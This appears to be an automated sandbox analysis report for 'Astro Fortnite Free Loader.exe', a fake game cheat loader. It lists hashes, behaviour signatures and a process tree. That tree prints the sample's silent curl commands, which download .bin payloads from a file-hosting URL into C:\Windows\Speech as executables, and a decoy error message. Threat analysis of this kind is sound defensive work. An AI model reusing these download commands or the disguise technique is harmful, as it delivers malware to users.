d684f65afeaf36f09228552a6a3c76c53ac2e9affb10dded7c8727656ad71ed3

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
07-07-2024 14:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Astro Fortnite Free Loader.exe
Size

14.4MB
MD5

c284115e08a73e4efd15e6e5cb3ca43e
SHA1

f054f448b26d0d771ad46221790dd7f4930cc428
SHA256

d684f65afeaf36f09228552a6a3c76c53ac2e9affb10dded7c8727656ad71ed3
SHA512

92713ba56f8343e74789ff37dbbede91cb778d76e637e34af884a579d7aa0667fdc4aa2af4a2e2d3b3dbb90f700e1be76966402a8605378db7637719d903fc0e
SSDEEP

393216:16wSPvI+HcfkP/K6gwoUTJtiY7o+WwIXh:16zPvXcfcy6g0TDPxMXh

Score

1^/10

Malware Config

Signatures

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1232	timeout.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2244	Astro Fortnite Free Loader.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 2244 wrote to memory of 2348	2244	Astro Fortnite Free Loader.exe	29
PID 2244 wrote to memory of 2348	2244	Astro Fortnite Free Loader.exe	29
PID 2244 wrote to memory of 2348	2244	Astro Fortnite Free Loader.exe	29
PID 2244 wrote to memory of 2604	2244	Astro Fortnite Free Loader.exe	30
PID 2244 wrote to memory of 2604	2244	Astro Fortnite Free Loader.exe	30
PID 2244 wrote to memory of 2604	2244	Astro Fortnite Free Loader.exe	30
PID 2348 wrote to memory of 2324	2348	cmd.exe	31
PID 2348 wrote to memory of 2324	2348	cmd.exe	31
PID 2348 wrote to memory of 2324	2348	cmd.exe	31
PID 2348 wrote to memory of 2388	2348	cmd.exe	32
PID 2348 wrote to memory of 2388	2348	cmd.exe	32
PID 2348 wrote to memory of 2388	2348	cmd.exe	32
PID 2348 wrote to memory of 2652	2348	cmd.exe	33
PID 2348 wrote to memory of 2652	2348	cmd.exe	33
PID 2348 wrote to memory of 2652	2348	cmd.exe	33
PID 2244 wrote to memory of 2716	2244	Astro Fortnite Free Loader.exe	34
PID 2244 wrote to memory of 2716	2244	Astro Fortnite Free Loader.exe	34
PID 2244 wrote to memory of 2716	2244	Astro Fortnite Free Loader.exe	34
PID 2244 wrote to memory of 2828	2244	Astro Fortnite Free Loader.exe	35
PID 2244 wrote to memory of 2828	2244	Astro Fortnite Free Loader.exe	35
PID 2244 wrote to memory of 2828	2244	Astro Fortnite Free Loader.exe	35
PID 2828 wrote to memory of 2084	2828	cmd.exe	36
PID 2828 wrote to memory of 2084	2828	cmd.exe	36
PID 2828 wrote to memory of 2084	2828	cmd.exe	36
PID 2244 wrote to memory of 2824	2244	Astro Fortnite Free Loader.exe	38
PID 2244 wrote to memory of 2824	2244	Astro Fortnite Free Loader.exe	38
PID 2244 wrote to memory of 2824	2244	Astro Fortnite Free Loader.exe	38
PID 2084 wrote to memory of 1232	2084	cmd.exe	39
PID 2084 wrote to memory of 1232	2084	cmd.exe	39
PID 2084 wrote to memory of 1232	2084	cmd.exe	39

C:\Users\Admin\AppData\Local\Temp\Astro Fortnite Free Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Astro Fortnite Free Loader.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Astro Fortnite Free Loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2348
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Astro Fortnite Free Loader.exe" MD5
    3⤵
    PID:2324
- - C:\Windows\system32\find.exe
    find /i /v "md5"
    3⤵
    PID:2388
- - C:\Windows\system32\find.exe
    find /i /v "certutil"
    3⤵
    PID:2652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/crypted.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  PID:2604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/Update.bin --output C:\Windows\Speech\Update.exe
  2⤵
  PID:2716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo Couldn't resolve host name && timeout /t 5"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Windows\system32\cmd.exe
    cmd /C "color b && title Error && echo Couldn't resolve host name && timeout /t 5"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2084
  - - C:\Windows\system32\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:1232
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2244 -s 256
  2⤵
  PID:2824

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2244-5-0x000000013F5D0000-0x0000000140E27000-memory.dmp

Filesize
24.3MB

Download
memory/2244-10-0x000000013F5D0000-0x0000000140E27000-memory.dmp

Filesize
24.3MB

Download
memory/2244-9-0x000000013F8A0000-0x000000013FFB9000-memory.dmp

Filesize
7.1MB

Download
memory/2244-11-0x000000013F5D0000-0x0000000140E27000-memory.dmp

Filesize
24.3MB

Download
memory/2244-4-0x00000000770D0000-0x00000000770D2000-memory.dmp

Filesize
8KB

Download
memory/2244-2-0x00000000770D0000-0x00000000770D2000-memory.dmp

Filesize
8KB

Download
memory/2244-0-0x00000000770D0000-0x00000000770D2000-memory.dmp

Filesize
8KB

Download
memory/2244-12-0x000000013F5D0000-0x0000000140E27000-memory.dmp

Filesize
24.3MB

Download
memory/2244-13-0x000000013F8A0000-0x000000013FFB9000-memory.dmp

Filesize
7.1MB

Download